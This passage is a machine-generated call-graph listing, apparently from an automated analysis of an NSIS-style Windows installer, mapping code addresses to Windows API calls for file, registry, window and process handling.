4470->4471 4475 403247 4470->4475 4470->4476 4471->4476 4473 405f61 ReadFile 4473->4475 4474 405f90 WriteFile 4474->4475 4475->4473 4475->4474 4475->4476 4476->4448 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4476 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4512 402ed5 4510->4512 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4512->4514 4515 402edd 4512->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5509 4071e5 5512 406976 5509->5512 5510 406a00 GlobalAlloc 5510->5512 5513 4072e1 5510->5513 5511 4069f7 GlobalFree 5511->5510 5512->5510 5512->5511 5512->5512 5512->5513 5514 406a77 GlobalAlloc 5512->5514 5515 406a6e GlobalFree 5512->5515 5514->5512 5514->5513 5515->5514 5516 402868 5517 402c41 17 API calls 5516->5517 5518 40286f FindFirstFileW 5517->5518 5519 402897 5518->5519 5522 402882 5518->5522 5524 40632f wsprintfW 5519->5524 5521 4028a0 5525 4063e8 lstrcpynW 5521->5525 5524->5521 5525->5522 5526 401968 5527 402c1f 17 API calls 5526->5527 5528 40196f 5527->5528 5529 402c1f 17 API calls 5528->5529 5530 40197c 5529->5530 5531 402c41 17 API calls 5530->5531 5532 401993 lstrlenW 5531->5532 5534 4019a4 5532->5534 5533 4019e5 5534->5533 5538 4063e8 lstrcpynW 5534->5538 5536 4019d5 5536->5533 5537 4019da lstrlenW 5536->5537 5537->5533 5538->5536 5539 40166a 5540 402c41 17 API calls 5539->5540 5541 401670 5540->5541 5542 40672b 2 API calls 5541->5542 5543 401676 5542->5543 5544 6ffb2c57 5545 6ffb2c6f 5544->5545 5546 6ffb158f 2 API calls 5545->5546 5547 6ffb2c8a 5546->5547 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5031 4017bb 5026->5031 5027 4017f7 5029 405eb9 2 API calls 5027->5029 5028 40672b 2 API calls 5028->5031 5029->5031 5031->5027 5031->5028 5032 4017cd CompareFileTime 5031->5032 5033 40188d 5031->5033 5038 4063e8 lstrcpynW 5031->5038 5042 40640a 17 API calls 5031->5042 5048 405a4e MessageBoxIndirectW 5031->5048 5051 401864 5031->5051 5054 405ede GetFileAttributesW CreateFileW 5031->5054 5032->5031 5034 405450 24 API calls 5033->5034 5036 401897 5034->5036 5035 405450 24 API calls 5053 401879 5035->5053 5037 4031d6 44 API calls 5036->5037 5039 4018aa 5037->5039 5038->5031 5040 4018be SetFileTime 5039->5040 5041 4018d0 CloseHandle 5039->5041 5040->5041 5043 4018e1 5041->5043 5041->5053 5042->5031 5044 4018e6 5043->5044 5045 4018f9 5043->5045 5046 40640a 17 API calls 5044->5046 5047 40640a 17 API calls 5045->5047 5049 4018ee lstrcatW 5046->5049 5050 401901 5047->5050 5048->5031 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5035 5051->5053 5052->5053 5054->5031 5055->5022 5056->5023 5057 4027ef 5058 402a70 5057->5058 5059 4027f6 5057->5059 5060 402c1f 17 API calls 5059->5060 5061 4027fd 5060->5061 5062 40280c SetFilePointer 5061->5062 5062->5058 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5058 5548 6ffb16d4 5549 6ffb1703 5548->5549 5550 6ffb1b5f 22 API calls 5549->5550 5551 6ffb170a 5550->5551 5552 6ffb171d 5551->5552 5553 6ffb1711 5551->5553 5555 6ffb1727 5552->5555 5556 6ffb1744 5552->5556 5554 6ffb1272 2 API calls 5553->5554 5559 6ffb171b 5554->5559 5560 6ffb153d 3 API calls 5555->5560 5557 6ffb174a 5556->5557 5558 6ffb176e 5556->5558 5561 6ffb15b4 3 API calls 5557->5561 5562 6ffb153d 3 API calls 5558->5562 5563 6ffb172c 5560->5563 5564 6ffb174f 5561->5564 5562->5559 5565 6ffb15b4 3 API calls 5563->5565 5566 6ffb1272 2 API calls 5564->5566 5567 6ffb1732 5565->5567 5568 6ffb1755 GlobalFree 5566->5568 5569 6ffb1272 2 API calls 5567->5569 5568->5559 5570 6ffb1769 GlobalFree 5568->5570 5571 6ffb1738 GlobalFree 5569->5571 5570->5559 5571->5559 5572 401a72 5573 402c1f 17 API calls 5572->5573 5574 401a7b 5573->5574 5575 402c1f 17 API calls 5574->5575 5576 401a20 5575->5576 5577 406af2 5578 406976 5577->5578 5579 4072e1 5578->5579 5580 406a00 GlobalAlloc 5578->5580 5581 4069f7 GlobalFree 5578->5581 5582 406a77 GlobalAlloc 5578->5582 5583 406a6e GlobalFree 5578->5583 5580->5578 5580->5579 5581->5580 5582->5578 5582->5579 5583->5582 5584 401573 5585 401583 ShowWindow 5584->5585 5586 40158c 5584->5586 5585->5586 5587 40159a ShowWindow 5586->5587 5588 402ac5 5586->5588 5587->5588 5589 401cf3 5590 402c1f 17 API calls 5589->5590 5591 401cf9 IsWindow 5590->5591 5592 401a20 5591->5592 5593 402df3 5594 402e05 SetTimer 5593->5594 5595 402e1e 5593->5595 5594->5595 5596 402e6c 5595->5596 5597 402e72 MulDiv 5595->5597 5598 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5597->5598 5598->5596 5600 4014f5 SetForegroundWindow 5601 402ac5 5600->5601 5602 402576 5603 402c41 17 API calls 5602->5603 5604 40257d 5603->5604 5607 405ede GetFileAttributesW CreateFileW 5604->5607 5606 402589 5607->5606 5257 401b77 5258 401b84 5257->5258 5259 401bc8 5257->5259 5260 401c0d 5258->5260 5266 401b9b 5258->5266 5261 401bf2 GlobalAlloc 5259->5261 5262 401bcd 5259->5262 5264 40640a 17 API calls 5260->5264 5268 4022f7 5260->5268 5263 40640a 17 API calls 5261->5263 5262->5268 5278 4063e8 lstrcpynW 5262->5278 5263->5260 5270 4022f1 5264->5270 5276 4063e8 lstrcpynW 5266->5276 5267 401bdf GlobalFree 5267->5268 5272 405a4e MessageBoxIndirectW 5270->5272 5271 401baa 5277 4063e8 lstrcpynW 5271->5277 5272->5268 5274 401bb9 5279 4063e8 lstrcpynW 5274->5279 5276->5271 5277->5274 5278->5267 5279->5268 5280 4024f8 5281 402c81 17 API calls 5280->5281 5282 402502 5281->5282 5283 402c1f 17 API calls 5282->5283 5284 40250b 5283->5284 5285 402533 RegEnumValueW 5284->5285 5286 402527 RegEnumKeyW 5284->5286 5289 40288b 5284->5289 5287 40254f RegCloseKey 5285->5287 5288 402548 5285->5288 5286->5287 5287->5289 5288->5287 5291 40167b 5292 402c41 17 API calls 5291->5292 5293 401682 5292->5293 5294 402c41 17 API calls 5293->5294 5295 40168b 5294->5295 5296 402c41 17 API calls 5295->5296 5297 401694 MoveFileW 5296->5297 5298 4016a0 5297->5298 5299 4016a7 5297->5299 5300 401423 24 API calls 5298->5300 5301 40672b 2 API calls 5299->5301 5303 402250 5299->5303 5300->5303 5302 4016b6 5301->5302 5302->5303 5304 4061ae 36 API calls 5302->5304 5304->5298 5615 401e7d 5616 402c41 17 API calls 5615->5616 5617 401e83 5616->5617 5618 402c41 17 API calls 5617->5618 5619 401e8c 5618->5619 5620 402c41 17 API calls 5619->5620 5621 401e95 5620->5621 5622 402c41 17 API calls 5621->5622 5623 401e9e 5622->5623 5624 401423 24 API calls 5623->5624 5625 401ea5 5624->5625 5632 405a14 ShellExecuteExW 5625->5632 5627 40288b 5628 401ee7 5628->5627 5633 406873 WaitForSingleObject 5628->5633 5630 401f01 CloseHandle 5630->5627 5632->5628 5634 40688d 5633->5634 5635 40689f GetExitCodeProcess 5634->5635 5636 4067fe 2 API calls 5634->5636 5635->5630 5637 406894 WaitForSingleObject 5636->5637 5637->5634 5638 4019ff 5639 402c41 17 API calls 5638->5639 5640 401a06 5639->5640 5641 402c41 17 API calls 5640->5641 5642 401a0f 5641->5642 5643 401a16 lstrcmpiW 5642->5643 5644 401a28 lstrcmpW 5642->5644 5645 401a1c 5643->5645 5644->5645 5646 401000 5647 401037 BeginPaint GetClientRect 5646->5647 5648 40100c DefWindowProcW 5646->5648 5650 4010f3 5647->5650 5651 401179 5648->5651 5652 401073 CreateBrushIndirect FillRect DeleteObject 5650->5652 5653 4010fc 5650->5653 5652->5650 5654 401102 CreateFontIndirectW 5653->5654 5655 401167 EndPaint 5653->5655 5654->5655 5656 401112 6 API calls 5654->5656 5655->5651 5656->5655 5657 401503 5658 40150b 5657->5658 5660 40151e 5657->5660 5659 402c1f 17 API calls 5658->5659 5659->5660 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4535 40288b 4531->4535 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4535 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5661 402104 5662 402c41 17 API calls 5661->5662 5663 40210b 5662->5663 5664 402c41 17 API calls 5663->5664 5665 402115 5664->5665 5666 402c41 17 API calls 5665->5666 5667 40211f 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402129 5668->5669 5670 402c41 17 API calls 5669->5670 5672 402133 5670->5672 5671 402172 CoCreateInstance 5676 402191 5671->5676 5672->5671 5673 402c41 17 API calls 5672->5673 5673->5671 5674 401423 24 API calls 5675 402250 5674->5675 5676->5674 5676->5675 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4791 40402a 4788->4791 4792 403fea GetDlgItem GetDlgItem 4788->4792 4789->4788 4790 403eaa 4789->4790 4793 403eb5 SetWindowPos 4790->4793 4794 403ec8 4790->4794 4796 404084 4791->4796 4804 401389 2 API calls 4791->4804 4795 40435f 18 API calls 4792->4795 4793->4794 4798 403ee5 4794->4798 4799 403ecd ShowWindow 4794->4799 4800 404014 SetClassLongW 4795->4800 4797 4043ab SendMessageW 4796->4797 4818 403fd4 4796->4818 4828 404096 4797->4828 4801 403f07 4798->4801 4802 403eed DestroyWindow 4798->4802 4799->4798 4803 40140b 2 API calls 4800->4803 4806 403f0c SetWindowLongW 4801->4806 4807 403f1d 4801->4807 4805 404309 4802->4805 4803->4791 4808 40405c 4804->4808 4815 404319 ShowWindow 4805->4815 4805->4818 4806->4818 4811 403fc6 4807->4811 4812 403f29 GetDlgItem 4807->4812 4808->4796 4813 404060 SendMessageW 4808->4813 4809 40140b 2 API calls 4809->4828 4810 4042ea DestroyWindow EndDialog 4810->4805 4868 4043c6 4811->4868 4816 403f59 4812->4816 4817 403f3c SendMessageW IsWindowEnabled 4812->4817 4813->4818 4815->4818 4820 403f66 4816->4820 4821 403fad SendMessageW 4816->4821 4822 403f79 4816->4822 4831 403f5e 4816->4831 4817->4816 4817->4818 4819 40640a 17 API calls 4819->4828 4820->4821 4820->4831 4821->4811 4825 403f81 4822->4825 4826 403f96 4822->4826 4824 40435f 18 API calls 4824->4828 4829 40140b 2 API calls 4825->4829 4830 40140b 2 API calls 4826->4830 4827 403f94 4827->4811 4828->4809 4828->4810 4828->4818 4828->4819 4828->4824 4849 40422a DestroyWindow 4828->4849 4859 40435f 4828->4859 4829->4831 4832 403f9d 4830->4832 4865 404338 4831->4865 4832->4811 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4828 4849->4805 4850 404244 CreateDialogParamW 4849->4850 4850->4805 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4818 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4805 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4827 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4818 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5677 401f06 5678 402c41 17 API calls 5677->5678 5679 401f0c 5678->5679 5680 405450 24 API calls 5679->5680 5681 401f16 5680->5681 5682 4059d1 2 API calls 5681->5682 5683 401f1c 5682->5683 5685 40288b 5683->5685 5686 406873 5 API calls 5683->5686 5688 401f3f CloseHandle 5683->5688 5687 401f31 5686->5687 5687->5688 5690 40632f wsprintfW 5687->5690 5688->5685 5690->5688 5691 6ffb103d 5694 6ffb101b 5691->5694 5695 6ffb1516 GlobalFree 5694->5695 5696 6ffb1020 5695->5696 5697 6ffb1027 GlobalAlloc 5696->5697 5698 6ffb1024 5696->5698 5697->5698 5699 6ffb153d 3 API calls 5698->5699 5700 6ffb103b 5699->5700 5701 404809 5702 404819 5701->5702 5703 40483f 5701->5703 5704 40435f 18 API calls 5702->5704 5705 4043c6 8 API calls 5703->5705 5706 404826 SetDlgItemTextW 5704->5706 5707 40484b 5705->5707 5706->5703 5708 40190c 5709 401943 5708->5709 5710 402c41 17 API calls 5709->5710 5711 401948 5710->5711 5712 405afa 67 API calls 5711->5712 5713 401951 5712->5713 5714 40230c 5715 402314 5714->5715 5719 40231a 5714->5719 5716 402c41 17 API calls 5715->5716 5716->5719 5717 402c41 17 API calls 5718 402328 5717->5718 5720 402c41 17 API calls 5718->5720 5722 402336 5718->5722 5719->5717 5719->5718 5720->5722 5721 402c41 17 API calls 5723 40233f WritePrivateProfileStringW 5721->5723 5722->5721 5724 401f8c 5725 402c41 17 API calls 5724->5725 5726 401f93 5725->5726 5727 4067c2 5 API calls 5726->5727 5728 401fa2 5727->5728 5729 401fbe GlobalAlloc 5728->5729 5731 402026 5728->5731 5730 401fd2 5729->5730 5729->5731 5732 4067c2 5 API calls 5730->5732 5733 401fd9 5732->5733 5734 4067c2 5 API calls 5733->5734 5735 401fe3 5734->5735 5735->5731 5739 40632f wsprintfW 5735->5739 5737 402018 5740 40632f wsprintfW 5737->5740 5739->5737 5740->5731 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4990 402c41 17 API calls 4987->4990 4989 402c81 17 API calls 4988->4989 4991 40239d 4989->4991 4992 4023c8 4990->4992 4994 4023a7 4991->4994 4995 4023d5 4991->4995 4998 402cff 4992->4998 4996 402c41 17 API calls 4994->4996 4997 4023ae RegDeleteValueW RegCloseKey 4996->4997 4997->4995 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4995 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->4999 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5741 40190f 5742 402c41 17 API calls 5741->5742 5743 401916 5742->5743 5744 405a4e MessageBoxIndirectW 5743->5744 5745 40191f 5744->5745 5746 40558f 5747 4055b0 GetDlgItem GetDlgItem GetDlgItem 5746->5747 5748 405739 5746->5748 5791 404394 SendMessageW 5747->5791 5750 405742 GetDlgItem CreateThread CloseHandle 5748->5750 5751 40576a 5748->5751 5750->5751 5753 405795 5751->5753 5754 405781 ShowWindow ShowWindow 5751->5754 5755 4057ba 5751->5755 5752 405620 5758 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5752->5758 5756 4057f5 5753->5756 5760 4057a9 5753->5760 5761 4057cf ShowWindow 5753->5761 5793 404394 SendMessageW 5754->5793 5757 4043c6 8 API calls 5755->5757 5756->5755 5768 405803 SendMessageW 5756->5768 5763 4057c8 5757->5763 5766 405695 5758->5766 5767 405679 SendMessageW SendMessageW 5758->5767 5762 404338 SendMessageW 5760->5762 5764 4057e1 5761->5764 5765 4057ef 5761->5765 5762->5755 5769 405450 24 API calls 5764->5769 5770 404338 SendMessageW 5765->5770 5771 4056a8 5766->5771 5772 40569a SendMessageW 5766->5772 5767->5766 5768->5763 5773 40581c CreatePopupMenu 5768->5773 5769->5765 5770->5756 5775 40435f 18 API calls 5771->5775 5772->5771 5774 40640a 17 API calls 5773->5774 5776 40582c AppendMenuW 5774->5776 5777 4056b8 5775->5777 5780 405849 GetWindowRect 5776->5780 5781 40585c TrackPopupMenu 5776->5781 5778 4056c1 ShowWindow 5777->5778 5779 4056f5 GetDlgItem SendMessageW 5777->5779 5782 4056e4 5778->5782 5783 4056d7 ShowWindow 5778->5783 5779->5763 5785 40571c SendMessageW SendMessageW 5779->5785 5780->5781 5781->5763 5784 405877 5781->5784 5792 404394 SendMessageW 5782->5792 5783->5782 5786 405893 SendMessageW 5784->5786 5785->5763 5786->5786 5787 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5786->5787 5789 4058d5 SendMessageW 5787->5789 5789->5789 5790 4058fe GlobalUnlock SetClipboardData CloseClipboard 5789->5790 5790->5763 5791->5752 5792->5779 5793->5753 5794 401491 5795 405450 24 API calls 5794->5795 5796 401498 5795->5796 5804 401d14 5805 402c1f 17 API calls 5804->5805 5806 401d1b 5805->5806 5807 402c1f 17 API calls 5806->5807 5808 401d27 GetDlgItem 5807->5808 5809 402592 5808->5809 5810 404495 lstrcpynW lstrlenW 5811 403a96 5812 403aa1 5811->5812 5813 403aa5 5812->5813 5814 403aa8 GlobalAlloc 5812->5814 5814->5813 5815 402598 5816 4025c7 5815->5816 5817 4025ac 5815->5817 5819 4025fb 5816->5819 5820 4025cc 5816->5820 5818 402c1f 17 API calls 5817->5818 5827 4025b3 5818->5827 5822 402c41 17 API calls 5819->5822 5821 402c41 17 API calls 5820->5821 5823 4025d3 WideCharToMultiByte lstrlenA 5821->5823 5824 402602 lstrlenW 5822->5824 5823->5827 5824->5827 5825 402645 5826 40262f 5826->5825 5828 405f90 WriteFile 5826->5828 5827->5825 5827->5826 5829 405fbf 5 API calls 5827->5829 5828->5825 5829->5826 5830 40451e 5831 404536 5830->5831 5835 404650 5830->5835 5836 40435f 18 API calls 5831->5836 5832 4046ba 5833 404784 5832->5833 5834 4046c4 GetDlgItem 5832->5834 5839 4043c6 8 API calls 5833->5839 5840 4046de 5834->5840 5841 404745 5834->5841 5835->5832 5835->5833 5837 40468b GetDlgItem SendMessageW 5835->5837 5838 40459d 5836->5838 5863 404381 EnableWindow 5837->5863 5844 40435f 18 API calls 5838->5844 5845 40477f 5839->5845 5840->5841 5846 404704 SendMessageW LoadCursorW SetCursor 5840->5846 5841->5833 5842 404757 5841->5842 5847 40476d 5842->5847 5848 40475d SendMessageW 5842->5848 5850 4045aa CheckDlgButton 5844->5850 5864 4047cd 5846->5864 5847->5845 5852 404773 SendMessageW 5847->5852 5848->5847 5849 4046b5 5853 4047a9 SendMessageW 5849->5853 5861 404381 EnableWindow 5850->5861 5852->5845 5853->5832 5856 4045c8 GetDlgItem 5862 404394 SendMessageW 5856->5862 5858 4045de SendMessageW 5859 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5858->5859 5860 4045fb GetSysColor 5858->5860 5859->5845 5860->5859 5861->5856 5862->5858 5863->5849 5867 405a14 ShellExecuteExW 5864->5867 5866 404733 LoadCursorW SetCursor 5866->5841 5867->5866 5868 40149e 5869 4022f7 5868->5869 5870 4014ac PostQuitMessage 5868->5870 5870->5869 5871 401c1f 5872 402c1f 17 API calls 5871->5872 5873 401c26 5872->5873 5874 402c1f 17 API calls 5873->5874 5875 401c33 5874->5875 5876 402c41 17 API calls 5875->5876 5877 401c48 5875->5877 5876->5877 5878 401c58 5877->5878 5879 402c41 17 API calls 5877->5879 5880 401c63 5878->5880 5881 401caf 5878->5881 5879->5878 5882 402c1f 17 API calls 5880->5882 5883 402c41 17 API calls 5881->5883 5885 401c68 5882->5885 5884 401cb4 5883->5884 5886 402c41 17 API calls 5884->5886 5887 402c1f 17 API calls 5885->5887 5888 401cbd FindWindowExW 5886->5888 5889 401c74 5887->5889 5892 401cdf 5888->5892 5890 401c81 SendMessageTimeoutW 5889->5890 5891 401c9f SendMessageW 5889->5891 5890->5892 5891->5892 5893 402aa0 SendMessageW 5894 402ac5 5893->5894 5895 402aba InvalidateRect 5893->5895 5895->5894 5896 402821 5897 402827 5896->5897 5898 402ac5 5897->5898 5899 40282f FindClose 5897->5899 5899->5898 5900 4015a3 5901 402c41 17 API calls 5900->5901 5902 4015aa SetFileAttributesW 5901->5902 5903 4015bc 5902->5903 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4570 4035c6 4563->4570 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4571 403474 12 API calls 4567->4571 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4572 405cea CharNextW 4570->4572 4576 4036c0 4570->4576 4578 4036c2 4570->4578 4574 40370f 4571->4574 4572->4570 4573 40375d 4580 405cea CharNextW 4573->4580 4616 403800 4573->4616 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4579 403474 12 API calls 4575->4579 4576->4564 4732 4063e8 lstrcpynW 4578->4732 4584 403741 4579->4584 4597 40377c 4580->4597 4584->4568 4584->4629 4585 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4585->4588 4589 4039ce ExitProcess 4585->4589 4586 40382a 4744 405a4e 4586->4744 4590 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4590 4591 40399e 4588->4591 4590->4591 4596 4067c2 5 API calls 4591->4596 4593 403840 4599 4059b9 5 API calls 4593->4599 4594 4037da 4598 405dc5 18 API calls 4594->4598 4604 4039a5 4596->4604 4597->4593 4597->4594 4605 4037e6 4598->4605 4600 403845 lstrcatW 4599->4600 4601 403861 lstrcatW lstrcmpiW 4600->4601 4602 403856 lstrcatW 4600->4602 4607 40387d 4601->4607 4601->4629 4602->4601 4603 4039ba ExitWindowsEx 4603->4589 4608 4039c7 4603->4608 4604->4603 4604->4608 4605->4629 4733 4063e8 lstrcpynW 4605->4733 4610 403882 4607->4610 4611 403889 4607->4611 4612 40140b 2 API calls 4608->4612 4609 4037f5 4734 4063e8 lstrcpynW 4609->4734 4614 40591f 4 API calls 4610->4614 4615 40599c 2 API calls 4611->4615 4612->4589 4617 403887 4614->4617 4618 40388e SetCurrentDirectoryW 4615->4618 4676 403ad8 4616->4676 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4628 4061ae 36 API calls 4626->4628 4627 4061ae 36 API calls 4627->4631 4628->4629 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4627 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4638 403480 4637->4638 4639 40348a 4638->4639 4640 405cbd 3 API calls 4638->4640 4639->4566 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4665 402f80 4648->4665 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4659 402fbe 4654->4659 4656 402e8e 32 API calls 4655->4656 4658 4030af 4656->4658 4657 403447 ReadFile 4657->4659 4661 4030eb GlobalAlloc 4658->4661 4658->4665 4761 40345d SetFilePointer 4658->4761 4659->4655 4659->4657 4660 403143 4659->4660 4659->4665 4668 402e8e 32 API calls 4659->4668 4663 402e8e 32 API calls 4660->4663 4662 403102 4661->4662 4669 405f0d 2 API calls 4662->4669 4663->4665 4665->4573 4666 4030cc 4667 403447 ReadFile 4666->4667 4670 4030d7 4667->4670 4668->4659 4671 403113 CreateFileW 4669->4671 4670->4661 4670->4665 4671->4665 4672 40314d 4671->4672 4760 40345d SetFilePointer 4672->4760 4674 40315b 4675 4031d6 44 API calls 4674->4675 4675->4665 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4684 403b53 lstrcatW 4682->4684 4686 4062b6 3 API calls 4682->4686 4685 403b02 4684->4685 4762 403dae 4685->4762 4686->4684 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4697 40640a 17 API calls 4694->4697 4695->4691 4700 403bd8 lstrlenW 4695->4700 4704 405cea CharNextW 4695->4704 4698 403cd5 4696->4698 4699 403c56 RegisterClassW 4696->4699 4697->4696 4703 40140b 2 API calls 4698->4703 4701 403cdf 4699->4701 4702 403c8c SystemParametersInfoW CreateWindowExW 4699->4702 4705 403be6 lstrcmpiW 4700->4705 4706 403c0c 4700->4706 4701->4629 4702->4698 4707 403cdb 4703->4707 4708 403bd5 4704->4708 4705->4706 4709 403bf6 GetFileAttributesW 4705->4709 4710 405cbd 3 API calls 4706->4710 4707->4701 4713 403dae 18 API calls 4707->4713 4708->4700 4712 403c02 4709->4712 4711 403c12 4710->4711 4771 4063e8 lstrcpynW 4711->4771 4712->4706 4716 405d09 2 API calls 4712->4716 4714 403cec 4713->4714 4717 403cf8 ShowWindow 4714->4717 4718 403d7b 4714->4718 4716->4706 4719 406752 3 API calls 4717->4719 4772 405523 OleInitialize 4718->4772 4721 403d10 4719->4721 4725 403d1e GetClassInfoW 4721->4725 4727 406752 3 API calls 4721->4727 4722 403d81 4723 403d85 4722->4723 4724 403d9d 4722->4724 4723->4701 4730 40140b 2 API calls 4723->4730 4726 40140b 2 API calls 4724->4726 4728 403d32 GetClassInfoW RegisterClassW 4725->4728 